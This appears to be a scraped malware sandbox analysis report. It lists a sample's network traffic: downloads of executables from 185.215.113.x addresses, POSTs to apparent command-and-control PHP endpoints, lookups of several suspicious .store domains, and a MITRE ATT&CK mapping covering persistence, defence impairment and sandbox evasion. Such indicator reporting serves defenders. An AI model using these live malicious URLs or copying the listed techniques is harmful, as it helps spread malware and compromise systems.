POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/off/random.exe

http

skotes.exe

279.5kB
8.4MB
6018
6010

HTTP Request

GET http://185.215.113.16/luma/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/steam/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/off/random.exe

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/6c4adf523b719729.php

http

e1ae7b97ca.exe

957 B
745 B
10
8

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200
104.21.5.155:443

https://founpiuer.store/api

tls, http

71b8acff7f.exe

1.7kB
10.2kB
15
17

HTTP Request

POST https://founpiuer.store/api

HTTP Response

403

HTTP Request

POST https://founpiuer.store/api

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

132 B
90 B
2
1

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

106.209.201.84.in-addr.arpa

dns

146 B
133 B
2
1

DNS Request

106.209.201.84.in-addr.arpa

DNS Request

106.209.201.84.in-addr.arpa
8.8.8.8:53

20.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

20.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

43.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

43.113.215.185.in-addr.arpa
8.8.8.8:53

16.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

16.113.215.185.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

288 B
158 B
4
1

DNS Request

28.118.140.52.in-addr.arpa

DNS Request

28.118.140.52.in-addr.arpa

DNS Request

28.118.140.52.in-addr.arpa

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

360 B
158 B
5
1

DNS Request

241.150.49.20.in-addr.arpa

DNS Request

241.150.49.20.in-addr.arpa

DNS Request

241.150.49.20.in-addr.arpa

DNS Request

241.150.49.20.in-addr.arpa

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

presticitpo.store

dns

71b8acff7f.exe

63 B
128 B
1
1

DNS Request

presticitpo.store
8.8.8.8:53

crisiwarny.store

dns

71b8acff7f.exe

62 B
127 B
1
1

DNS Request

crisiwarny.store
8.8.8.8:53

fadehairucw.store

dns

71b8acff7f.exe

63 B
128 B
1
1

DNS Request

fadehairucw.store
8.8.8.8:53

thumbystriw.store

dns

71b8acff7f.exe

126 B
128 B
2
1

DNS Request

thumbystriw.store

DNS Request

thumbystriw.store
8.8.8.8:53

necklacedmny.store

dns

71b8acff7f.exe

320 B
5

DNS Request

necklacedmny.store

DNS Request

necklacedmny.store

DNS Request

necklacedmny.store

DNS Request

necklacedmny.store

DNS Request

necklacedmny.store
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

206.113.215.185.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

206.113.215.185.in-addr.arpa
8.8.8.8:53

founpiuer.store

dns

71b8acff7f.exe

244 B
93 B
4
1

DNS Request

founpiuer.store

DNS Request

founpiuer.store

DNS Request

founpiuer.store

DNS Request

founpiuer.store

DNS Response

104.21.5.155

172.67.133.135
8.8.8.8:53

75.117.19.2.in-addr.arpa

dns

140 B
133 B
2
1

DNS Request

75.117.19.2.in-addr.arpa

DNS Request

75.117.19.2.in-addr.arpa
8.8.8.8:53

155.5.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

155.5.21.104.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion